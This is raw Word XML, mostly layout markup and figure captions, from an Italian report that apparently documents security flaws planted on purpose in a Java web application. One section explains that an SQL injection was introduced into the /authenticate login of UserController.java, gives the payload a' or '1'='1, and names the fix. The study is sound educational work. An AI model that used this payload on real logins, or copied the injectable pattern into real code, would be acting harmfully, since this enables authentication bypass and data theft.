          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252012544" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="517041F7" wp14:editId="5A9F7D57">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>100330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6983412" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="363878378"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3412" cy="1036320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7DCA29" w14:textId="77777777" w:rsidR="007239A2" w:rsidRPr="008302E7" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252010496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33985FED" wp14:editId="77A4E175">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265978F8" w14:textId="77DEE760" w:rsidR="007239A2" w:rsidRPr="00AF24B9"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6</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85FED" id="_x0000_s1051" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-36.1pt;margin-top:79.15pt;width:554.1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bXGQIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L3ZSr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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="265978F8" w14:textId="77DEE760" w:rsidR="007239A2" w:rsidRPr="00AF24B9"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6</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00843A5F">
                        <w:t>HobbyController.java</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0B6A47F5" wp14:editId="07573EA0">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51827B90" w14:textId="77777777" w:rsidR="007239A2" w:rsidRPr="00490AC3" w:rsidRDefault="007239A2" w:rsidP="007239A2">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47F5" id="_x0000_s1052" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-28.9pt;margin-top:77.35pt;width:554.1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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="51827B90" w14:textId="77777777" w:rsidR="007239A2" w:rsidRPr="00490AC3" w:rsidRDefault="007239A2" w:rsidP="007239A2">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00DC4D59">
                        <w:t>HobbyController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC13A99" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2"/>
    <w:p w14:paraId="68F1BFCB" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2"/>
    <w:p w14:paraId="1D57C223" w14:textId="0EFCCD08" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:r w:rsidRPr="00C56823">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HobbyController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABF8810" w14:textId="60931627" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2"/>
    <w:p w14:paraId="30D3B55D" w14:textId="619379A0" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2"/>
    <w:p w14:paraId="44E18BAC" w14:textId="6611F1E3" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252009472" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="390A3194" wp14:editId="23978FAE">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5CB295E" w14:textId="77777777" w:rsidR="007239A2" w:rsidRPr="000E7CB4" w:rsidRDefault="007239A2" w:rsidP="007239A2">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A3194" id="_x0000_s1053" type="#_x0000_t202" style="position:absolute;margin-left:-35.05pt;margin-top:248.15pt;width:551.4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z8GgIAAEA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ntOOQOqhPN&#10;jjDIwju51tRwI3x4Fkg6oJlI2+GJjtpAV3I4W5w1gD/+5o/5RA9FOetIVyX33w8CFWfmqyXioghH&#10;A0djNxr20K6ARp3S1jiZTLqAwYxmjdC+kuSXsQuFhJXUq+RhNFdhUDetjFTLZUoiqTkRNnbrZCw9&#10;AvvSvwp0Z1oCsfkIo+JE8YadITfx45aHQFAn6iKwA4pnvEmmifzzSsU9+PU/ZV0Xf/ET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GYifPwaAgAAQAQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsB&#10;Ai0AFAAGAAgAAAAhAC7EzLHiAAAADAEAAA8AAAAAAAAAAAAAAAAAdAQAAGRycy9kb3ducmV2Lnht&#10;bFBLBQYAAAAABAAEAPMAAACDBQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="15CB295E" w14:textId="77777777" w:rsidR="007239A2" w:rsidRPr="000E7CB4" w:rsidRDefault="007239A2" w:rsidP="007239A2">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76897BE" wp14:editId="52921822">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2DFEBDC3" w14:textId="5A7770EC" w:rsidR="007239A2" w:rsidRPr="006B1CA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7</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897BE" id="_x0000_s1054" type="#_x0000_t202" style="position:absolute;margin-left:-35.05pt;margin-top:248.15pt;width:551.4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f1GgIAAEA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ndOOQOqhPN&#10;jjDIwju51tRwI3x4Fkg6oJlI2+GJjtpAV3I4W5w1gD/+5o/5RA9FOetIVyX33w8CFWfmqyXioghH&#10;A0djNxr20K6ARp3S1jiZTLqAwYxmjdC+kuSXsQuFhJXUq+RhNFdhUDetjFTLZUoiqTkRNnbrZCw9&#10;AvvSvwp0Z1oCsfkIo+JE8YadITfx45aHQFAn6iKwA4pnvEmmifzzSsU9+PU/ZV0Xf/ET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Khu1/UaAgAAQAQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsB&#10;Ai0AFAAGAAgAAAAhAC7EzLHiAAAADAEAAA8AAAAAAAAAAAAAAAAAdAQAAGRycy9kb3ducmV2Lnht&#10;bFBLBQYAAAAABAAEAPMAAACDBQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2DFEBDC3" w14:textId="5A7770EC" w:rsidR="007239A2" w:rsidRPr="006B1CA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7</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Schermata web salvataggio hobby da parte dell'utente</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB82BFD" w14:textId="71ADCE0E" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252016640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B956376" wp14:editId="15DDE223">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>113030</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7179908" cy="2430780"/>
            <wp:effectExtent l="0" t="0" r="254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622"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7179908"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C4EF9" w14:textId="0DC8E5CC" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2"/>
    <w:p w14:paraId="52EE5390" w14:textId="3E34B31E" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2"/>
    <w:p w14:paraId="1C08A27E" w14:textId="734BB932" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2"/>
    <w:p w14:paraId="124E73D3" w14:textId="2E8374A9" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2"/>
    <w:p w14:paraId="66BE1408" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2"/>
    <w:p w14:paraId="25136175" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2"/>
    <w:p w14:paraId="738E8437" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2"/>
    <w:p w14:paraId="3D733375" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2"/>
    <w:p w14:paraId="0789E48D" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2"/>
    <w:p w14:paraId="5011AEEB" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="153AF71F" w14:textId="2F47845B" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252015616" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65AD5F4A" wp14:editId="757450C1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-420370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1203325</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6960870"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63DE282F" w14:textId="6E67F8C2" w:rsidR="007239A2" w:rsidRPr="00E25CB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5F4A" id="Casella di testo 2" o:spid="_x0000_s1055" type="#_x0000_t202" style="position:absolute;margin-left:-33.1pt;margin-top:94.75pt;width:548.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RGwIAAEA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sdja++UwhSbHZx0+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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="63DE282F" w14:textId="6E67F8C2" w:rsidR="007239A2" w:rsidRPr="00E25CB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8</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HobbyController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252013568" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32C0C76B" wp14:editId="11933D83">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-510540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6961002" cy="1656758"/>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1002" cy="1656758"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0188DBB0" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="68352ED3" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7F91329C" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="03596A1D" w14:textId="0B5D0D25" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252019712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BCDF107" wp14:editId="3B50BC7A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-592455</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3428365</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7304405" cy="6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304405" cy="635"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="072B203E" w14:textId="22BBBF5C" w:rsidR="007239A2" w:rsidRPr="00FE059B"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9</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Hobby senza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F107" id="Casella di testo 6" o:spid="_x0000_s1056" type="#_x0000_t202" style="position:absolute;margin-left:-46.65pt;margin-top:269.95pt;width:575.1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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="072B203E" w14:textId="22BBBF5C" w:rsidR="007239A2" w:rsidRPr="00FE059B"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>29</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Hobby senza campi inutili</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252017664" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B732DF4" wp14:editId="3D5F8E2B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>383540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7304405" cy="2987993"/>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4405" cy="2987993"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DED03F" w14:textId="221DC4BF" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="19C027AC" w14:textId="6E8F1057" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5B106B72" w14:textId="690E208B" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5A2B2718" w14:textId="77577227" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2488A808" w14:textId="1E8767A4" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6FE6FA7D" w14:textId="4CE77F73" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1179B2E4" w14:textId="65C980E5" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="52E3DDA6" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="44464AAC" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6A8B121F" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="501C1E6E" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="583B09B2" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6D9D74A6" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6EDA69D6" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5636A543" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7BE6B807" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="684FC47C" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="12C022D6" w14:textId="77777777" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0C8094F3" w14:textId="1638A759" w:rsidR="00FC6340" w:rsidRPr="00CA09AC" w:rsidRDefault="00FD7204" w:rsidP="00CA09AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD7204">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Potential JDBC Injection / Nonconstant string passed to execute or addBatch method on an SQL statement (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 xml:space="preserve">È una vulnerabilità che consente all’attaccante di fare query verso il database con lo scopo di accedere o modificare dati che normalmente non potrebbe vedere come le </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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09917C20" w:rsidR="00370316" w:rsidRDefault="00CA09AC" w:rsidP="00F13DB4">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel nostro codice è stata introdotta questa vulnerabilità nel login (API </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA09AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/authenticate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> di </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA09AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UserController.java</w:t>
      </w:r>
      <w:r>
        <w:t>) usando lo statement SQL</w:t>
      </w:r>
      <w:r w:rsidR="00A2084F">
        <w:t xml:space="preserve"> (Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidR="00A2084F">
        <w:t>),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2B76507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r w:rsidR="00FC6340" w:rsidRPr="00FC6340">
        <w:t>a' or '1'='1</w:t>
      </w:r>
      <w:r w:rsidR="00FC6340">
        <w:t xml:space="preserve"> per fare l’attacco</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781465DD" w14:textId="603F76F5" w:rsidR="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="007B1CF1">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02ACB9D2" w14:textId="41429904" w:rsidR="00CA09AC" w:rsidRPr="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="007B1CF1">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA09AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C0FBD" w14:textId="212BD785" w:rsidR="00FC6340" w:rsidRDefault="00FC6340" w:rsidP="007B1CF1">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Il fix è dato dal codice originale</w:t>
      </w:r>
      <w:r w:rsidR="00F35257">
        <w:t xml:space="preserve"> che non fa uso dell’SQL statement</w:t>
      </w:r>
      <w:r w:rsidR="00A2084F">
        <w:t xml:space="preserve"> (Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidR="00A2084F">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="008B0B12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0CF1D" w14:textId="74F91E45" w:rsidR="00FC6340" w:rsidRPr="00FC6340" w:rsidRDefault="00CD7B9B" w:rsidP="00FC6340">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251952128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1779EB5F" wp14:editId="140B3CBF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>192405</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7090884" cy="2155009"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2022515239"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0884" cy="2155009"/>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5E6836CA"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2AD78A87" w14:textId="77777777" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="12607E5E" w14:textId="5201A2CE" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7FD2E68C" w14:textId="5E497E76" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251806720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29BB63B8" wp14:editId="4B45AF1D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>221615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6818630" cy="635"/>
                <wp:effectExtent l="0" t="0" r="127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18AEB7FB"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30</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7" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:17.45pt;width:536.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SsGQIAAEA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88l8NqWQpNhs+jn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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="00D25FE4" w14:textId="18AEB7FB"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30</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java con metodo vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D565123" w14:textId="3010E4F6" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3F22A96D" w14:textId="23CF90BB" w:rsidR="008B6F6D" w:rsidRDefault="00CD7B9B" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251953152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14CFE2EE" wp14:editId="6CF00BE1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5232609" cy="2901435"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="571655852"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609" cy="2901435"/>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2406B696" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="546C4086" w14:textId="1D0AF361" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6CCE269F" w14:textId="61FF7354" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5F927F28" w14:textId="58FECF3E" w:rsidR="00573261" w:rsidRDefault="00573261" w:rsidP="00467BBC"/>
    <w:p w14:paraId="427D09D0" w14:textId="791AAC90" w:rsidR="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3D054A76" w14:textId="77777777" w:rsidR="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="13D29688" w14:textId="77777777" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4FD794B1" w14:textId="4DD9E44F" w:rsidR="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1774903E" w14:textId="2059764F" w:rsidR="00CA09AC" w:rsidRDefault="00CD7B9B" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251808768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="638BB9F5" wp14:editId="308A47CD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>90170</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4760595" cy="635"/>
                <wp:effectExtent l="0" t="0" r="1905"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0B03C723"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31</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8" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:7.1pt;width:374.8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Kj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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
